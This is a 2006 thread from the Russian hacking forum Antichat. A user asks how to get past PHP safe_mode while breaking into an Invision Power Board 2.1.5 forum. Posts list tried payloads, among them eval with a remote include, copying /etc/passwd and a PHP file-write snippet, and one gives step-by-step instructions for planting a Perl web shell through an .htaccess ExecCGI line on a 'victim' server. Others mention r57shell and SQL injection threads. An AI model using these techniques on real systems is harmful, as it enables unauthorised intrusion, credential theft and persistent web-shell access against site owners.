Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Обход Safe Mode прл взломе Invision Power board |

07.09.2006, 09:03
|
|
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме: 2320925
Репутация:
1348
|
|
Обход Safe Mode прл взломе Invision Power board
Прошу совета - есть в наличии 2.1.5 IPB форум.
Пытаюсь выполнить комманду через багу в регулятных выражениях, но всему мешает SAFE MODE.
Соответственно - запрещены все system(), passthru(), popen(), exec. Включена опция open_base_dir_ristrict. Фильтруются символы ======> $ ' " . <======
в созданном посте.
Пробовал:
eval (include(http://lalalal));//'
Пробовал eval(file_get_contents());//'
Пробовал
copy("compress.zlib:///etc/passwd", "/home/<username>/passwd.txt");
Пробовал обходить фильтрацию при помощи &#NN;
но это не катит, и я так и не понял как ее нужно обходить и к какой кодировке приводить символы.
Пробовал просто include, без eval (он, само собой, вообще не исполняется). Что посоветуете?
У меня вообще один вариант, кажется, остался - пользовать SQL-injection, расшифровывать пароль, а потом пытаться заливать что-нибудь на perl. Кстати, буду рад ссылкам на топики форума об SQL-inject в 2.1.5
Заранее, благодарю.
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
|
|
|

07.09.2006, 10:18
|
|
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме: 7426415
Репутация:
1398
|
|
В шелле от rst они предусмотрены обход safe mod. А так наверно там половину функций отключены и наверно тяжело очень будет сделать. Не могу дать совета такого сильно.
|
|
|

07.09.2006, 13:18
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме: 8042357
Репутация:
3742
|
|
если на файле +w то иногда может прокатить
PHP код:
<?
$file = '';
$cont = '';
$handle = fopen($filename, 'w');
fwrite($handle, $comecontent);
fclose($handle);
?>
$file – имя файла
$cont – то, что пишем в файл
https://forum.antichat.ru/thread17281-2.1.5+sql.html
https://forum.antichat.ru/thread18495-2.1.5+sql.html
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|

20.12.2006, 23:49
|
|
Участник форума
Регистрация: 30.08.2006
Сообщений: 181
Провел на форуме: 1058786
Репутация:
45
|
|
У меня таже проблема залил r57shell v 1.31 там есть несколько встроенных способов обхода, но не один не пашет, что можете посоветовать.
|
|
|

22.12.2006, 16:34
|
|
Познающий
Регистрация: 17.02.2005
Сообщений: 39
Провел на форуме: 127284
Репутация:
1
|
|
Попробуй следующим образом.
Находим директорию в которую можно писать и доступную по ввв.
Создаем там файл .htaccess со строчкой Options +ExecCGI внутри.
Заливаем шелл туда же какойнить перловый шелл.
Далее делаем ему chmod +x shell.cgi
Потом пытаемся вызвать его из броузера.
hxxt://victim.com/blablabla/shell.cgi
У меня получалось обойти safe_mode таким способом.
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|